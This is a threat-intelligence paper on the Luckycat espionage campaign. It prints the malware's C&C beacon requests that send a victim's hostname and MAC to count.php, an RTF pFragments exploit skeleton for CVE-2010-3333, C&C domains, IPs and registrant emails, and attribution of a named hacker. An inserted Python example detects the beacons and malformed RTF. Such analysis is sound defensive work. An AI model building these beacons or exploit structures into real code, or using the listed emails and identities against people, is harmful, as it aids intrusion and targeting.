##### Trend Micro Research Paper 2012

# LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan

###### By: Forward-Looking Threat Research Team

#### CONTENTS

- Introduction
  - Diversity of Targets
  - Diversity of Malware
  - Diversity of Infrastructure
  - Operations
  - Attribution
- Luckycat
  - Examples of Luckycat Attacks
    - Example 1: Japan
    - Example 2: India
    - Example 3: Tibet
- Vulnerabilities and Malware Samples
- Campaign Codes
- Command and Control
- Operations
- Attribution
- Campaign Connections
  - ShadowNet
  - Duojeen
  - Sparksrv
  - Comfoo
- Conclusion
- Defending Against APTs
  - Local and External Threat Intelligence
  - Mitigation and Cleanup Strategy
  - Educating Employees Against Social Engineering
  - Data-Centric Protection Strategy
- Trend Micro Threat Protection Against Luckycat Campaign Components

#### INTRODUCTION

The number of targeted attacks has dramatically increased. Unlike the largely indiscriminate attacks associated with cybercrime, which focus on stealing credit card and banking information, targeted attacks are better characterized as "cyber espionage." Highly targeted attacks are computer intrusions that threat actors stage in order to aggressively pursue and compromise specific targets, often leveraging social engineering, so that they can maintain a persistent presence within the victim's network, move laterally, and extract sensitive information.[1]

In a typical targeted attack, a target receives a contextually relevant email that encourages the potential victim to click a link or open a file.[2] The links and files the attackers send contain malicious code that exploits vulnerabilities in popular software. The exploit's payload is malware that is silently executed on the target's computer. This exploitation allows the attackers to take control of and obtain data from the compromised computer. In other cases, the attackers send disguised executable files, usually compressed in archives, that also compromise the target's computer if opened. The malware connects back to command-and-control (C&C) servers under the attackers' control, from which they can command the compromised computer to download additional malware and tools that allow them to move laterally throughout the target's network. These attacks are, however, not isolated "smash-and-grab" incidents but are part of consistent campaigns that aim to establish a covert presence in a target's network so that information can be extracted as needed.

Targeted attacks are rarely isolated events. In fact, they are constant. It is more useful to think of them as campaigns: a series of failed and successful attempts to compromise a target's network over a certain period of time. The attackers often keep track of the different attacks within a campaign in order to determine which individual attack compromised a specific victim's network. As the attackers learn more about their targets from open source research (publicly available information) as well as from previous attacks, the specificity of the attacks may sharply increase.

Cyber-espionage campaigns often focus on specific industries or communities of interest in addition to a geographic focus. Different positions of visibility often yield additional sets of targets pursued by the same threat actors. We have been tracking the campaign dubbed "Luckycat" and found that, in addition to targeting Indian military research institutions, as previously revealed by Symantec, the same campaign targeted entities in Japan as well as the Tibetan community.[3]

The Luckycat campaign targeted the following industries and/or communities:

- Aerospace
- Energy
- Engineering
- Shipping
- Military research
- Tibetan activists

The Luckycat campaign attacked a diverse set of targets using a variety of malware, some of which have been linked to other cyber-espionage campaigns. The attackers behind this campaign maintain a diverse set of C&C infrastructure and leverage anonymity tools to obfuscate their operations. We were able to track elements of this campaign to hackers based in China.

##### Diversity of Targets

The Luckycat campaign, which has been active since at least June 2011, has been linked to 90 attacks against targets in Japan and India as well as Tibetan activists. Each malware attack involves a unique campaign code that can be used to track which victims were compromised by which malware attack. This illustrates that the attackers are both very aggressive and continually target their intended victims. These are not smash-and-grab attacks but constitute a "campaign" comprising a series of ongoing attacks over time. In sum, the Luckycat campaign managed to compromise 233 computers.[4]
[1] http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_trends-in-targeted-attacks.pdf
[3] http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_luckycat_hackers.pdf

##### Diversity of Malware

We were able to identify five malware families either utilized by or hosted on the same dedicated server the Luckycat campaign uses. Some were used as second-stage malware that the attackers pushed to victims whose networks were compromised by first-stage malware. Second-stage malware typically provides additional functionality and is used especially when the first-stage malware is very simplistic. In addition, we found that the attackers used multiple malware families that coincide with malware used in other campaigns. This indicates a level of collaboration across campaigns.

##### Diversity of Infrastructure

The Luckycat campaign uses free web-hosting services that provide a diversity of domain names as well as IP addresses. This distributes the campaign, making it more difficult to track. However, the attackers also made use of Virtual Private Servers (VPSs) that housed not only their primary malware, TROJ_WIMMIE, but others as well.[5] These servers may also act as anchors, as servers on free hosting services are shut down for malicious activity. As a result, the campaign stabilized its infrastructure over time, transferring victims, often through the use of second-stage malware, from free hosting servers to their stable core of VPSs.

##### Operations

TROJ_WIMMIE, favored by the Luckycat attackers, bundles a significant amount of information on the victim and uploads it to a C&C server. One such file recovered from a C&C server is actually the result of a test run by the attackers. The information reveals that the attackers use proxy and anonymity tools to shield their identities as well as a variety of mailing programs to instigate targeted attacks. In addition, the language settings of the attackers' computers indicate that they are Chinese speakers. This is consistent with the information Symantec obtained, which shows that the attackers logged in to their C&C server from IP addresses allocated to China.

##### Attribution

Using open source research, we were able to connect the email address used to register one of the Luckycat C&C servers to a hacker in the Chinese underground community. He uses the nickname "dang0102" and has published posts in the famous hacker forum XFocus, as well as recruited others to join a research project on network attack and defense at the Information Security Institute of Sichuan University. The hacker, also known as "scuhkr," has authored articles related to backdoors and shellcode in a hacking magazine.

#### LUCKYCAT

The malware used in the Luckycat campaign, detected by Trend Micro as TROJ_WIMMIE[6] or VBS_WIMMIE,[7] connects to a C&C server via HTTP over port 80. It is notable because it uses Windows Management Instrumentation (WMI)[8] to establish persistence.[9] VBS_WIMMIE registers a script that works as a backdoor to the WMI event handler and deletes the files associated with it or with TROJ_WIMMIE. As a result, the backdoor cannot be detected by antivirus software through simple file scanning.

The compromised computer posts data to a PHP script that runs on the C&C server, usually count.php:

```
POST /count/count.php?m=c&n=[HOSTNAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE]@ HTTP/1.0
Accept: */*
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: [HOSTNAME]
Content-Length: 0
Connection: Keep-Alive
Pragma: no-cache
```

The initial communication results in the creation of a file on the C&C server that identifies the compromised computer. Although the file is empty, the file name contains the hostname of the compromised computer, followed by its MAC address, along with the campaign code the attackers use to identify which malware attack caused the compromise:

```
~[HOSTNAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE]
```

The attacker then creates a file with a name that ends in @.c, which contains a command:

```
[HOSTNAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE]@.c
```

The compromised computer then downloads the file and executes the specified command, which may include any of the following:

- Get external IP address
- Download file
- Execute shell command
- Upload file

The compromised computer then sends the output to the C&C server and deletes the command file:

```
POST /count/count.php?m=w&n=[HOST_NAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE]@@.t HTTP/1.0
POST /count/count.php?m=d&n=[HOST_NAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE]@@.c HTTP/1.0
```

One of the common initial commands instructs the compromised computer to upload the results of information-gathering commands. This command causes the compromised computer to create a directory listing of the available drives, along with the output of the commands "ipconfig," "tasklist," and "systeminfo." The resulting files are compressed using the CAB compression format and uploaded to the C&C server. This provides the attackers a full set of information to evaluate the nature of the compromised computer.

[6] http://about-threats.trendmicro.com/Malware.aspx?language=us&name=TROJ_WIMMIE.C
[7] http://about-threats.trendmicro.com/malware.aspx?language=us&name=VBS_WIMMIE.C
[8] The Luckycat malware may be notable but its technique is no longer new, as the WMI malware featured in the paper cited below also exhibited the same capability.

##### Examples of Luckycat Attacks

###### Example 1: Japan

A targeted email was sent to some organizations in Japan. One of the attacks occurred during the confusion after the Great East Japan Earthquake and the Fukushima Nuclear Power Plant accident. The attackers used the disaster to lure potential victims into opening a malicious .PDF attachment. The .PDF file exploited a vulnerability in Adobe Reader, CVE-2010-2883, in order to drop TROJ_WIMMIE onto the target's system.[10] This malware communicated with a Luckycat C&C server. The decoy document contains the radiation dose measurement results that were published on the Tokyo Electric Power Company (TEPCO) website.[11]

_Figure 1: Decoy document opened after exploiting an Adobe Reader vulnerability_

###### Example 2: India

A malicious document containing information on India's ballistic missile defense program was used to lure potential victims into opening it. This document contains malicious code that exploits a vulnerability in Microsoft Office, CVE-2010-3333, to drop TROJ_WIMMIE onto the compromised system so that it would connect to a C&C server the Luckycat hackers operate.[12]

_Figure 2: Redacted decoy document opened after exploiting a Microsoft Word vulnerability_

###### Example 3: Tibet

Malicious emails with .DOC attachments that leverage Tibetan themes in order to trick recipients into opening them have been found. This particular sample exploits the same vulnerability in Microsoft Office, CVE-2010-3333, to drop TROJ_WIMMIE onto the target's system so that it would communicate back to a C&C server the Luckycat hackers operate.

_Figure 3: Decoy document opened after exploiting a Microsoft Office vulnerability_

#### VULNERABILITIES AND MALWARE SAMPLES

Most of the samples we have seen exploited CVE-2010-3333. Dubbed the "Rich Text Format (RTF) Stack Buffer Overflow Vulnerability," it causes a buffer overflow in the Microsoft Word RTF parser when the "pFragments" shape property is given a malformed value. To verify exploitation, one should look for the following keywords:

- pFragments: seen after the string "\sn"
- \sv: the exploit code is seen after this

The typical structure of the malicious RTF document is:

```
{\rtf1{\shp{\sp{\sn pFragments}{\sv "exploit code"}}}}
```

The rest of the samples we found exploited the following vulnerabilities in Adobe Reader and Flash Player:

- CVE-2010-2883: Adobe Reader TTF SING table parsing vulnerability
- CVE-2010-3654: Adobe Flash Player AVM2 multi-name button class vulnerability[13]
- CVE-2011-0611: Adobe Flash Player AVM1 shared object type vulnerability[14]
- CVE-2011-2462: Adobe Reader U3D component vulnerability[15]

[13] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654

|MD5|CVE Identifier|Campaign Code|
|---|---|---|
|dab3f591b37f5147ae92570323b5c47d|CVE-2010-3333|w1229|
|c023544af85edacc66cd577a0d665dec|CVE-2010-3333|w1229|
|cff0964ed2df5659b0a563f32b7c3eca|CVE-2010-3333|214|
|3deb2a5fcb6bf1f80a074fd351e6f620|CVE-2010-3333|2012|
|1aa1e795a5ba75f2a5862c6d01205b57|CVE-2010-2883, CVE-2010-3654, CVE-2011-0611|110824p|
|6a62d4532c7a0656381fee8fb51874d7|CVE-2010-2883, CVE-2010-3654, CVE-2011-0611|longjiao|
|cb9ab22f3356a3b054a7e9282a69f71e|CVE-2011-2462|gop|
|1dafdc9e507771d0d8887348ce3f1c52|CVE-2010-3333|gop|
|039a6e012f33495a1308b815ef098459|CVE-2010-3333|luck|
|be0b2e7a53b1dcacb8c54c180dc4ca27|CVE-2010-2883, CVE-2010-3654, CVE-2011-0611|11727p|
|00f07b0e701dcfa49e1c907f9242d028|CVE-2010-2883, CVE-2010-3654, CVE-2011-0611|110705hktq|
|411ab5eb2ef3153b61a49964f9ab4e64|CVE-2011-2462|1229|
|dcac508495d9800e476aa0c8e11b748d|CVE-2010-3333|2012|
|00e686e382806c33d9ae77256f33ed93|Not applicable|LY|
_Table 1: Luckycat malware samples sorted by exploit and campaign code_

#### CAMPAIGN CODES

Each malware attack involves a unique campaign code that can be used to track which systems were compromised by which attack. The campaign codes often contain dates that indicate when each malware attack was launched, which demonstrates how actively and frequently the attackers launched attacks. The campaign codes also reveal the attackers' intent, as some of them reference the intended targets. The following lists the campaign codes we discovered:

- 0607e
- 0609af
- 0613deliinfo
- 0613f
- 0614senior
- 0616itiT8
- 0706gggg
- 0804ggggdatanet1
- 0805ggggetp
- 0805ggggstp
- 0805ecil
- 0805gggg
- 0818ICG
- 0823ggggARDE
- 0824ggg
- 0826ggggtnd
- 1017navydiwali
- 1017ggg
- 1025gggCSC
- 1025 SC
- 1090silver89
- 110228cl
- 110311cl
- 110315cl
- 110315
- 110321cl
- 110329
- 110504
- 110603p89
- 110606rg789
- 110616np
- 110705hktq
- 110706gggg
- 110706hal
- 110705hktq
- 110708hktqw
- 110711gggg
- 110711hal
- 110711xzg
- 110713jp
- 110714jdap
- 110714tp
- 110715x
- 110718p
- 110816h
- 110824p
- 1108navyeast
- 1108vpsecretary
- 111031pp
- 1110mea
- 1114round
- 1122bol
- 1122gmail
- 1122other
- 11421is9
- 1145j9yb
- 1147s9
- 1148dq8
- 11614lmpn
- 11725imp
- 11727p
- 1229
- 2012
- 214
- 64sc109pfye
- 64sc239pf9010
- 720halheli
- 729ggggsenior
- 919ggggstp
- ggggstpdomainserver
- dang279wrdye
- god
- gop
- ishan99dfp
- j1141ap99
- j4611dq9
- kondulgml27pfye
- longjiao
- luck
- LY
- nec3rd79dfp
- nfounrsvan99uc
- nne
- ongs239pfye
- sai
- stmlsp211wd
- w1229
- wwwroot
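The count.php check-in, the HOST_MAC_CODE naming and the date-bearing campaign codes described above, together with the pFragments RTF structure from the Vulnerabilities section, are all things a responder can check mechanically. The following is an added example written for this page, not code from the paper or from Trend Micro. It assumes that the MAC address in the beacon is written without separators, that a campaign code whose leading six or four digits form a valid date encodes a YYMMDD or MMDD launch date (the year 2011 is an assumed default for the latter), and that a pFragments value longer than a few dozen bytes is abnormal; the request lines and RTF bodies it runs on are constructed for the demonstration.

```python
"""Luckycat indicator checks: count.php beacon parsing, campaign-code dates,
victim grouping and the pFragments RTF structure.

Added example for this page, not Trend Micro's code. Assumptions: MAC without
separators, YYMMDD/MMDD reading of campaign-code dates, an assumed pFragments
length threshold, and constructed sample inputs.
"""
import datetime
import re

# m=c: check-in (creates ~HOST_MAC_CODE@ on the server)
# m=w: upload command output to ...@@.t
# m=d: delete the command file ...@@.c
BEACON_RE = re.compile(
    r"POST\s+/count/count\.php\?m=(?P<mode>[cwd])&n=(?P<name>[^\s@]+)@(?P<suffix>\S*)\s+HTTP/1\.[01]"
)
MODES = {"c": "check-in", "w": "upload-output", "d": "delete-command"}


def parse_luckycat_beacon(request_line):
    """Return mode, hostname, MAC, campaign code and suffix for a Luckycat
    count.php request line, or None when the line is not one."""
    m = BEACON_RE.search(request_line)
    if not m:
        return None
    # n=HOST_MAC_CODE: the host name is assumed to contain no underscore
    parts = m.group("name").split("_", 2)
    if len(parts) != 3:
        return None
    host, mac, code = parts
    return {"mode": MODES[m.group("mode")], "hostname": host, "mac": mac,
            "campaign_code": code, "suffix": "@" + m.group("suffix")}


def campaign_code_date(code, year=2011):
    """Best-effort launch date from a code's leading digits: YYMMDD
    (110714jdap -> 2011-07-14) or MMDD (0607e -> 2011-06-07, year assumed).
    Returns None when no valid date leads the code ('2012' has no month 20)."""
    m = re.match(r"\d+", code)
    if not m:
        return None
    d = m.group(0)
    if len(d) >= 6:
        try:
            return datetime.date(2000 + int(d[:2]), int(d[2:4]), int(d[4:6]))
        except ValueError:
            pass
    if len(d) >= 4:
        try:
            return datetime.date(year, int(d[:2]), int(d[2:4]))
        except ValueError:
            pass
    return None


def group_by_campaign(request_lines):
    """Map each campaign code to the sorted hostnames seen beaconing with it,
    which is how the attackers themselves tie victims to lures."""
    seen = {}
    for line in request_lines:
        hit = parse_luckycat_beacon(line)
        if hit:
            seen.setdefault(hit["campaign_code"], set()).add(hit["hostname"])
    return {code: sorted(hosts) for code, hosts in seen.items()}


# {\sn pFragments}{\sv <value>}: the value is where the overflow data lives
PFRAGMENTS_RE = re.compile(rb"\\sn\s*pFragments\s*\}\s*\{\\sv\s*(?P<value>[^}]*)\}")


def scan_rtf_pfragments(data, max_value_len=64):
    """Return (suspicious, longest_value_length) for an RTF body. A value
    longer than max_value_len (assumed threshold; genuine property values are
    a few bytes) is treated as a CVE-2010-3333 attempt."""
    values = PFRAGMENTS_RE.findall(data)
    if not values:
        return False, 0
    longest = max(len(v) for v in values)
    return longest > max_value_len, longest


# Constructed samples, not taken from the paper
SAMPLE_REQUESTS = [
    "POST /count/count.php?m=c&n=WS-FIN-07_001122AABBCC_110714jdap@ HTTP/1.0",
    "POST /count/count.php?m=w&n=WS-FIN-07_001122AABBCC_110714jdap@@.t HTTP/1.0",
    "POST /count/count.php?m=d&n=WS-FIN-07_001122AABBCC_110714jdap@@.c HTTP/1.0",
    "POST /count/count.php?m=c&n=LAB-PC_00AABBCCDDEE_0607e@ HTTP/1.0",
    "GET /index.html HTTP/1.1",
]
SAMPLE_EXPLOIT_RTF = (b"{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv "
                      + b"41" * 200 + b"}}}}")
SAMPLE_BENIGN_RTF = b"{\\rtf1\\ansi{\\fonttbl{\\f0 Arial;}}\\f0 Quarterly report\\par}"

if __name__ == "__main__":
    for code, hosts in group_by_campaign(SAMPLE_REQUESTS).items():
        print(code, campaign_code_date(code), hosts)
    print(scan_rtf_pfragments(SAMPLE_EXPLOIT_RTF), scan_rtf_pfragments(SAMPLE_BENIGN_RTF))
```

Run over proxy logs, the grouping shows which lure reached which hosts; a code that appears on many hosts with the same date prefix is one mailing. The RTF scan is a structural check only: an exploit that hides the \sv value behind RTF control-word obfuscation will not match, so a negative result is incon­clusive, while a hit is worth a sandbox run.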
#### COMMAND AND CONTROL

The Luckycat campaign extensively uses free hosting services. We recorded the domains the attackers used as well as the email addresses they utilized to register the domains, where available. While the domains, including their suffixes, were considerably diverse, all were available from three different free hosting services. As such, the attackers had nothing to lose but time in order to continue creating diverse domain names for C&C servers.

|Domain|Email Address|
|---|---|
|cattree.1x.biz|lindagreen56@rediffmail.com|
|charlesbrain.shop.co|yamagami_2011@mail.goo.ne.jp|
|footballworldcup.website.org|ajayalpna@hotmail.com|
|frankwhales.shop.co|yamagami_2011@mail.goo.ne.jp|
|hi21222325.x.gg|hi2122325@hotmail.com|
|kinkeechow.shop.co|kinkee_chow@mail.goo.ne.jp|
|kittyshop.kilu.org|pbdelhioffice@gmail.com|
|perfect.shop.co|dsang72@yahoo.com|
|pumasports.website.org|ranjitrai123@hotmail.com|
|tomsburs.shop.co|yamagami_2011@mail.goo.ne.jp|
|vpoasport.shopping2000.com|beenznair@gmail.com|
|goodwell.all.co.uk|paltry.parrot@googlemail.com|
|fireequipment.website.org|shrivastava.agrim@gmail.com|
|tennissport.website.org|manindramohanshukla@yahoo.com|
|waterpool.website.org|jaganacharya@hotmail.com|
|tb123.xoomsite.com||
|tbda123.gwchost.com||
|toms.0fees.net||
|tomygreen.0fees.net||
|killmannets.0fees.net||
|maritimemaster.kilu.org||
|masterchoice.shop.co||
|jeepvihecle.shop.co||
|lucysmith.0fees.net||

_Table 2: Free web-hosting service domains the attackers used for C&C servers_

The attackers also maintain servers that do not appear to be from free web-hosting service providers. In fact, these appear to use dedicated VPS services.

|Domain|Email Address|
|---|---|
|clbest.greenglassint.net|19013788@qq.com|
|bailianlan.c.dwyu.com|dayinok@qq.com|
|duojee.info|duojeewei@qq.com|

_Table 3: C&C servers that the attackers hosted on VPSs_

We also found advertisements for VPS services using two of the C&C server IP addresses in Table 3. While the VPS services were advertised in Chinese forums, the servers were actually hosted in the United States.

_Figure 4: Sample ads for the VPS services the attackers use_

The diversity of C&C hosting services used provided the attackers a resilient infrastructure. If one server, for instance, was shut down for malicious activity, they could easily create more servers. As victims of interest were identified, they could also be easily moved from free hosting servers to C&C servers set up on more stable VPSs. The domain and geographic diversity of the IP addresses also helped mask the attackers' locations.

#### OPERATIONS

The threat actors behind the Luckycat campaign tested one of their malware samples on a computer under their control. In the process, they uploaded down.cab, the result of the command that creates a directory listing of the available drives on a compromised system along with the output of the commands "ipconfig," "tasklist," and "systeminfo." We were able to download this file from the C&C server.
While it does not reveal the attackers' identities, it does provide an inside view of their operations. The result of the "systeminfo" command indicates that the attackers tested the malware in a virtual environment. The environment was set up using a Chinese-language version of Windows XP.

_Figure 5: Sample system information the attackers obtained after testing on a virtual machine (VM)_

We found that the product ID of the Windows XP software used was posted online in the past. It was a pirated Windows XP version that was made available for purchase in China.

_Figure 6: Sample ads for the pirated Windows XP version used_

While the rest of the information we gathered did not reveal significant clues due to the use of a VM, we found that the attackers left a shared drive, D:\, which was indexed by the malware. The index was then uploaded to the C&C server.

_Figure 7: Drive left available by the attackers that contains C&C scripts and victim information_

In one of the directories, ccclllmmmm, we found that the attackers put a copy of the count.php C&C backend as well as a list of the victims and the contents of their computers. We were also able to find that the C&C server the attackers used was a victim's computer.

_Figure 8: Victim information on the attackers' C&C server that is identical to the information on the attackers' shared D:\ drive_

To ensure operational security, the attackers installed Tor and Tunnelier. In fact, some of the malware-laden email samples sent through Yahoo! Mail were sent via Tor. The use of this anonymity tool allowed the attackers to obscure their IP addresses, making it increasingly difficult for researchers to pinpoint their locations.

_Figure 9: Anonymity tools the attackers had on the shared D:\ drive_

The attackers also had mailing software such as FoxMail and Supermailer on the shared D:\ drive. While these tools are not malicious, the attackers used them to easily send out socially engineered emails. These also allowed them to keep track of their various identities and email accounts. One of the samples we obtained used the Chinese-language version of FoxMail.

The attackers clearly have operational procedures in place to obscure their true locations with the aid of anonymity tools. They also have a virtualized environment set up to test and fine-tune their malware, as well as the necessary tools to maintain their various identities and send out socially engineered emails with malicious attachments.

#### ATTRIBUTION

Additional clues concerning the attackers had to do with the email address 19013788@qq.com, which was used to register one of the C&C servers, clbest.greenglassint.net. This email address can be mapped to the QQ number 19013788. QQ is popular instant-messaging (IM) software in China. This QQ number is linked to a hacker in the Chinese underground community who goes by the nickname "dang0102" and published posts in the famous hacker forum XFocus in 2005.

_Figure 10: Sample post by dang0102 using the QQ number, 19013788_

The same hacker also published a post on a student BBS of Sichuan University using the nickname "scuhkr" in 2005. He wanted to recruit 2–4 students to a network attack and defense research project at the Information Security Institute of Sichuan University at the time. Scuhkr also authored articles related to backdoors and shellcode in a hacking magazine that same year.[16]

_Figure 11: Post by scuhkr using the QQ number, 19013788_

The post in Figure 11 contains two email addresses, ggggggsccd@sina.com and scuhkr@21cn.com, along with an additional QQ number, 2888111. The email address scuhkr@21cn.com is also associated with an account on rootkit.com.[17] Investigating the second QQ number allowed us to determine that scuhkr also used the nickname "lolibaso." The other individual mentioned in the post also worked and studied at the Information Security Institute of Sichuan University and published several articles related to "fuzzing" vulnerabilities in 2006.

#### CAMPAIGN CONNECTIONS

We were able to identify five malware families that were either used by or hosted on the same dedicated server with the domain name duojee.info. Some of these were used as second-stage malware that the attackers pushed to victims whose systems had been compromised by first-stage malware. Second-stage malware typically provides additional functionality and is used especially when the first-stage malware is very simplistic. We also found that the attackers used several malware families that have been utilized in previous campaigns. This may indicate a level of collaboration across campaigns.

##### ShadowNet

The first interesting connection we noticed in conjunction with the Luckycat campaign had to do with ShadowNet, a cyber-espionage network documented by researchers at the University of Toronto and the ShadowServer Foundation.[18] We found a socially engineered email that had two malicious file attachments. One of the attachments was part of the Luckycat campaign while the other was part of the ShadowNet campaign. The ShadowNet campaign has a history of targeting Tibetan activists as well as the Indian government, which fits the profile of the Luckycat campaign as well.

_Figure 13: Relationship between the Luckycat and the ShadowNet campaigns_

The ShadowNet malware, detected by Trend Micro as TROJ_GUPD.AB, first connects to a blog in order to receive the URL of the C&C server. The URL was encoded using a modulus operation. The malware on the compromised computer decodes the URL and then issues a connection to the C&C server.
The compromised computer posts data to a PHP script running on the server, usually named index.php or all.php. The POST contains information about the compromised computer as well as a campaign code, and the information is stored in a .TXT file on the C&C server. The compromised computer continues to beacon to the C&C server to see if the operators have issued any commands. If they have, the compromised computer executes the given commands and reports the results back to the C&C server.

_Figure 12: Sample targeted email with both Luckycat and ShadowNet malware attachments_

_Figure 14: Sample ShadowNet malware related to a Luckycat email attack_

This attack used the theme of self-immolation in Tibet for both the email and the decoy document that is opened after the vulnerability exploitation. The malicious file attachment exploits a vulnerability in Microsoft Office, CVE-2010-3333, to drop malware onto the target's system. The malware was configured to connect to two blogs and a Yahoo! Group in order to find the C&C server's location.

The blogs and groups the ShadowNet attackers use can be easily updated whenever the C&C servers are changed. The URL of the blog is embedded in the malware. The malware connects to the blog, decodes the C&C URL, and then connects to the C&C server. The commands the server issues are also encoded using a simple logical operator; the malware decodes these using key codes that are sent along with the actual commands.

_Figure 15: Example of a blog used by ShadowNet to communicate an encoded C&C server location_

|MD5|CVE Identifier|Campaign Code|
|---|---|---|
|26891c3e4a2de034e4841db2a579734f|CVE-2011-2462|circle|
|ebea24fe1611a1ab778f5ecceb781fad|CVE-2010-3333|circle|

_Table 4: ShadowNet malware samples related to the Luckycat campaign_

##### Duojeen

The malware attacks related to the Duojeen campaign all target the Tibetan community and use a single C&C server, duojee.info. We also found that a malware binary available for download from duojee.info is a TROJ_WIMMIE Trojan that connects back to bailianlan.c.dwyu.com, a C&C server the Luckycat attackers use.

_Figure 16: Relationship between the Duojeen and the Luckycat campaigns_

The duojee.info server is the C&C component of the Duojeen campaign. The related malware, detected by Trend Micro as BKDR_DUOJEEN.A, connects to a C&C server and posts data to a PHP script typically named linux.php, solaris.php, or freebsd.php. The following information is encoded by the malware, using logical operators such as xor and or, or bitwise shifting on adjacent bytes:

- Hostname
- Computer name
- MAC address
- IP address, subnet mask, and gateway
- Network resources
- Running processes
- Microsoft Outlook user account information (e.g., HTTP mail user name, POP3 user name, or POP3 server)
- Recently opened files

The Duojeen malware continues to poll the C&C server and then executes one of the only two possible commands specified by the attackers:

- Stop the malware from communicating with the C&C server
- Download and execute a second-stage malware

_Figure 17: Sample Duojeen attack email_

One of the Duojeen attacks leverages a Tibetan-themed job ad to encourage potential victims to open an attached document that exploits a vulnerability in Microsoft Office, CVE-2010-3333, in order to drop malware that connects to duojee.info.

|MD5|CVE Identifier|Campaign Code|
|---|---|---|
|715cbbe21844bbb4f1f60a91ae28def3|CVE-2010-3333|aaaa|
|a9bda3c31fc6acc83a5226226f7ab554|CVE-2010-3333|aaaa|
|567a774cf865b50189e81c14b4ca4b63|CVE-2010-3333|aaaa|
|e62c115b6874726c309b3038a9391e28|CVE-2010-3333|aaaa|
|9860d087892fce98e6f639e3e9dba91e|Not applicable|aaa|
|d773e3bacc2c8389c2ab51c9cbc68480|Not applicable|aaa|

_Table 5: Duojeen malware samples_

Duojee.info also contains the PHP scripts used for commanding and controlling the Luckycat campaign at /holly/count.php as well as ShadowNet at /soom/cont.php. The duojee.info server also hosts a phishing page designed to steal passwords from mail.tibet.net users.

_Figure 18: Phishing page hosted on duojee.info_

The duojee.info server also has other malware from two additional families available for download.
One malware is known as "Comfoo," related to yet another cyber-espionage campaign, while the other is known as "Sparksrv."

_Figure 19: Relationship between the Sparksrv and the Luckycat campaigns_

##### Sparksrv

Sparksrv refers to a second-stage malware that provides backdoor access with significantly more functionality than first-stage droppers. Second-stage malware, often Remote Administration Trojans (RATs), are deployed because first-stage malware only provide simple "check-in" functionality such as a short list of commands that can be scheduled. Second-stage RATs, on the other hand, provide an additional access channel as well as "real-time" control over a compromised machine if the attackers and the victims are online at the same time.

The Sparksrv malware, detected by Trend Micro as BKDR_RPKNUF.A, was initially found on a ShadowNet server in November 2011. We have, however, found several instances of a newer version of the same malware on duojee.info. The malware initially sends the following information in plain text over port 443:

- IP address
- Identifier
- MAC address

Because this check-in is unencrypted even though it uses the HTTPS port, its content is visible to network inspection. Once the malware establishes a connection, it starts to receive commands from the C&C server, which allow the attackers to do the following:

- Start or kill a process
- Create or delete directories
- Copy or search for a file
- Load a DLL
- Download or upload files
- Invoke a command shell

|MD5|Domain|IP Address|
|---|---|---|
|0a927897ab5acff1e6bd45897368253b|fidk.rkntils.dnset.com|69.162.71.254|
|b53f71e4dd2ca8826e6191dee439564b|fidk.rkntils.dnset.com|69.162.71.254|
|a2b37776e0bd6594c688a8214371b9ff|rukiyeangel.dyndns.pro|199.192.152.100|

_Table 6: Sparksrv malware samples and C&C locations_

We also found an older version of the malware on a ShadowNet server, sunshine.shop.co.

|MD5|IP Address|
|---|---|
|d0eec59f1e74c0851c8dd1c8be88f2b9|173.208.242.25|

_Table 7: Older Sparksrv malware version found on a ShadowNet server_

##### Comfoo

Comfoo malware have been seen in conjunction with campaigns targeting sensitive entities in both Japan and India. We found a version of the Comfoo malware on the duojee.info server as well as an email attack that used the same version of Comfoo malware. In fact, the .DOC file used in the attack dropped an .EXE file with the same MD5 hash as the one found on the duojee.info server.
_Figure 20: Relationship between the Comfoo and the Luckycat campaigns_

While at least two of the Comfoo variants are essentially the same, the traffic encryption method used by the Comfoo sample found in connection with duojee.info differed from that of other Comfoo variants we have analyzed that are not directly related to the Luckycat campaign. The more common Comfoo samples used custom encryption routines, while the variant found on the duojee.info server used the Windows Cryptographic Application Programming Interface (CryptoAPI). This Comfoo variant's initial network communication sent the following information to the C&C server:

- Randomly generated characters
- MAC address
- IP address
- OS version
- The string "liberate" as campaign code

_Figure 21: Sample Comfoo campaign email_

This Comfoo email attack leverages the current situation in Tibet to encourage recipients to open a malicious attachment that exploits a vulnerability in Microsoft Office (CVE-2010-3333) in order to drop a malware onto the target's system.

_Figure 22: Comfoo decoy document that exploits a Microsoft Office vulnerability_

After the decoy document opens, the Comfoo malware begins to communicate with johnnees.rkntils.10dig.net, which resolves to the IP address 69.162.71.254, the same host that some of the Sparksrv malware samples we analyzed use.

The attackers gather the following information from infected systems:

- CPU, NETBIOS, and disk information
- System, OS version, and account information
- Network adapters, protocols, and configuration information
- Installed applications as well as Internet Explorer (IE) and Browser Helper Object (BHO) information

The malware the attackers use is capable of receiving several commands.

|Command|Description|
|---|---|
|0x233C|Invoke command shell|
|0x1B6C|Take screenshot|
|0x139C|Start interactive desktop|
|0x1F54|Start keylogging|
|0xFDC|Stop service|
|0xFF0|Delete service|
|0xBCC|Enumerate running processes|
|0xBE0|Terminate process|
|0x2EF4|Download file|

_Table 8: Commands the Comfoo malware receive_

|MD5|CVE Identifier|Campaign Code|
|---|---|---|
|24552d599b650ca3ecd467d9d740de33|CVE-2010-3333|liberate|
|6815ab1f11ac33d4c1149efc3206d794|Not applicable|liberate|
|6bd4e7d7408e0d8d1592e27fc19650c8|Not applicable|liberate|

_Table 9: Comfoo malware samples_

The samples in Table 9 connect to havefuns.rkntils.10dig.net or johnnees.rkntils.10dig.net, which both resolve to the same IP address, 69.162.71.254.

#### CONCLUSION

Targeted attacks have been extremely successful, making the scope of the problem truly global. These have been affecting governments, militaries, defense industries, high-technology companies, intergovernmental organizations, nongovernmental organizations (NGOs), media organizations, academic institutions, and activists worldwide.

